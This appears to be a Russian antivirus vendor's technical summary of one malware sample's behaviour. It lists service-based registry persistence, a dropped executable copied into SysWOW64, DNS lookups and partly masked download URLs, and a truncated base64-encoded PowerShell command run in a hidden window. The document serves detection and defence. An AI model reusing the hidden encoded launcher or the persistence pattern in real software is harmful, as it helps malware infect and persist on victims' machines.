Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\pollerpano] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pollerpano] 'ImagePath' = '"%WINDIR%\SysWOW64\pollerpano.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAHQAZgB5AG4AZwBjAHYAZQBrAHoAaQA9ACcAQwB6AGMAeABrAG4AZwB1AGEAdAByAGsAZgAnADsAJABZAGQAcQBjAHAAbABiAGgAegBlAHMAdgAgAD0AIAAnADQAOAA3ACcAOwAkAFAAegBxAG0AdgBpAHQAZQBtAD0AJwBEAHoAZgBkAGgAZQB...
- %HOMEPATH%\487.exe
- %HOMEPATH%\487.exe в %WINDIR%\syswow64\pollerpano.exe
- http://ke###hub.com/wp-content/d0lk27/
- http://18#.#31.62.54/arizona/
- DNS ASK na####onsulting.com
- DNS ASK ke###hub.com
- '%HOMEPATH%\487.exe'
- '%WINDIR%\syswow64\pollerpano.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABIAHQAZgB5AG4AZwBjAHYAZQBrAHoAaQA9ACcAQwB6AGMAeABrAG4AZwB1AGEAdAByAGsAZgAnADsAJABZAGQAcQBjAHAAbABiAGgAegBlAHMAdgAgAD0AIAAnADQAOAA3ACcAOwAkAFAAegBxAG0AdgBpAHQAZQBtAD0AJwBEAHoAZgBkAGgAZQB...' (со скрытым окном)